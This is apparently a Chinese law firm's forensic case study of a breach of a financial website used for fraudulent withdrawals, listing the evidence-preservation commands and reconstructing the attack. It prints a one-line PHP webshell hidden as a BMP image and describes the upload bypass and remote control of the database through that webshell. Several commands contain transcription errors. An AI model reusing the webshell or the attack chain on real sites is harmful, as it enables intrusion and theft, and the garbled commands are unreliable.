计算机入侵事件是如何取证？【非法获取计算机信息系统数据罪】

时间：2022-09-10 来源：长昊律师网浏览次数：次

来源：长昊商业秘密律师（非法获取计算机信息系统数据罪、非法获取计算机信息系统数据）

一、事件简介

某金融网站称：其注册会员的账户内的财产，在用户不知情的情况下被提现，但网站查证后发现并不是用户自身所为。值得注意的是，提现过程中使用的银行卡并非是用户名下真实存在的银行账户。根据现有信息推测，其计算机可能被非法人侵，网站数据被篡改，损失达上百万。

二、数据固定

数据固定是分析的前提，在固定过程中要兼顾数据原始性、完整性、可复现，可控制的原则。以下对该Linux服务器的固定过程进行详细描述。

1.目标信息
网站部署在阿里云上，使用的是Linux操作系统，受害者提供了被人侵计算机的IP和登录凭据。

2.基本信息固定
执行“history>history.log”导出历史命令；
执行“last>last.log”导出登录相关信息;
执行“lastb>lastb.log”导出登录失败信息;
执行“lastlog>lastlog.log”导出所有用户的最后一次登录信息；
执行“tarczvf/var/logvarlog.tar.gz”将/var/log整个目录打包；
执行“ps-AUX〉ps.log”导出进程信息；
执行“netstat-atunp>netstat.log”导出网络连接信息;

3.网站数据固定

(1)目录固定
根据网站应用配置文件可知，网站目录为“/www/c****i”，执行“tarczvf/www/c*****iwww.c*****i.com.tar.gz”将网站目录保存；

(2)访问日志固定
根据网站应用配置文件可知，访问日志保存位置在：“/etc/httpd/logs”，执行“tarczvf/etc/httpd/logsaccesslog.tar.gz”将网站访问日志保存。
为了确保日志的完整性，执行此命令前应该停止网站应用进程，否则日志文件会因网站应用进程锁定日志而无法读取：

4.数据库固定

(1)数据表固定
在网站目录内找到数据库连接配置文件，将网站数据库导出为“database.sql’，0

(2)数据库日志固定
根据Mysql数据库配置信息，将所有日志文件进行提取固定。

三、数据分析

1.系统日志分析
固定工作完成后，首先对固定的基本信息进行分析，未发现明显异常，排除暴力破解系统用户登录的入侵方式：

2.网站应用分析

(1)网站重构
安装Apache、PHP和Mysql,将固定的数据导人，使用Web浏览器访问后，网站首页成功展示。

(2)WebShell扫描
使用WebShell分析工具执行扫描，在网站目录下发现一个名为“up1oad****•php.bmp”的疑似网页木马的文件。

(3)WebShell分析
使用编码工具查看该文件后，发现存在以下代码“<?php@assert(base64_decode($P0ST[h31en]))?>”其含义是对post提交的h31en变量中的内容执行base64解码。
根据文件修改时间查找近似的文件，定位到符合条件的php代码页“adminer.php”，打开发现此页面的功能为数据库管理器，可以执行数据库管理动作。

通常情况下，网站管理员并没有在Web页上修改数据库的需求，结合文件创建时间分析，可以确定此页面是人侵者为了远程操控数据库而特意留下的接口。

3.网站访问日志分析
接下来从网站的访问日志人手，在日志中筛选出所有“adminer.php”页面的访问记录，并统计所有“adminer.php”页面访问记录中出现的“userjd”，得到4个用户的ID:t4$grep-E-i-o"user_id%5d=[e-9]{1,8}"adminer.php.
exclude.alibaba.log|sort|uniq
user_id%5D=1392
user_id%5D=1679
userid%5D=2613
user_id%5D=6248”

四、入侵还原

根据数据分析环节结果，接下来对整个入侵过程进行还原:

1.恶意文件上传
入侵者首先利用网站的文件上传漏洞，将含有恶意内容的PHP代码页，修改文件头部，伪装成BMP图片，成功绕过网站代码检测机制，并上传至网站的目录下；

2.确认上传文件证据
在网站对应目录找到上传成功的恶意代码文件“uploaddyp2p.php.php”，可见上传行为有效;

3.连接计算机
使用“chopper”工具连接此网站内的恶意代码页，连接成功后使用集成的文件管理器成功打开网站所在计算机的根目录，并获得管理权限；

4.上传数据库管理器
使用“chopper”工具集成的文件管理器，上传数据库管理器代码页“adminer.php”，读取数据库连接配置文件“/data/www/c*****i/dbconfig.php”，取得数据库权限。

5.修改数据
访问“adminer.php”页，篡改数据库数据，绑定银行卡；

6.执行提现
访问提现页，执行提现操作，成功将用户财产非法获取。

长昊律师事务所
THE ONE PERFECT
商业秘密 | 软件著作权
SINCE 1995
www.itscourt.com 13808805110 15800707700

创立于1995年的长昊律师事务所，扎根深圳辐射全国，在商业秘密和软件著作权两大核心方向，是专业致力于知识产权方面的律师事务所。长昊律师事务所坚持创新、开放合作、与时俱进，为众多科学技术领域的商业秘密、软件著作权类案件提供侵权维权、辩护、司法鉴定、司法审计、调查取证等高品质专项法律服务。
长昊律师事务所拥有近三十年专注商业秘密和软件著作权类案件经验的核心团队，自律师事务所成立以来，获得多项行业殊荣，2018年代表中华律师协会由法律出版社出版著作《特殊型知识产权法律实务—专论商业秘密与软件著作权》，长昊律师事务所及长昊律师在商业秘密和软件著作权领域取得的成绩成为办理知识产权领域的优秀律师事务所之一。
面向未来，长昊律师事务所将继往开来，砥砺前行，持续在尖端知识产权方面不断超越，努力奋进的执业要求，长昊律师将共同努力把长昊所打造成为知识产权品牌专业所。

文章声明：本网站发表的文章包括原创信息、转载信息和会员投稿，如您认为上述内容涉及个人、企业隐私或涉及著作权，要求修改或删除的，请发邮件至：1870527569@qq.com,我们将在一个工作日内和您联系妥善处理。

上一篇：在信息管理中计算机数据库系统的应用【非法获取计算机信息系统数据罪】

下一篇：计算机数据库中常用的入侵检测技术的方法【非法获取计算机信息系统数据罪】

分享到： QQ空间新浪微博腾讯微博天涯社区微信一键分享更多